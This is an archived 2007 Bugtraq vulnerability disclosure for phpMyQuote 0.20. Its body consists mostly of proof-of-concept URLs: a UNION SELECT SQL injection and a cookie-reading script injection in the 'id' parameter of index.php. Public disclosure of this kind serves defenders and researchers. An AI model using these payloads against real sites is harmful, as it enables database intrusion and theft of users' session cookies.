[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070909012656.27180.qmail@securityfocus.com>
Date: 9 Sep 2007 01:26:56 -0000
From: yollubunlar@...lubunlar.org
To: bugtraq@...urityfocus.com
Subject: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities
/////////////// Yollubunlar.org ///////////////
title: phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities
Author : Yollubunlar.Org
Orginal Article: http://yollubunlar.org/phpmyquote-020-version-multiple-sql-and-xss-vulnerabilities-3501.html
MainPage: http://yollubunlar.org/category/web-security
mail : yollubunlar@...lubunlar.org
Exploit Sql : http://site.com/script_path/index.php?action=edit&id=[Sql injction]
Example : /index.php?action=edit&id=-1%20union%20select%200,1,2,3,4,5/*
Exploit Xss :http://site.com/script_path/index.php?action=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/////////////// Yollubunlar.org ///////////////
Powered by blists - more mailing lists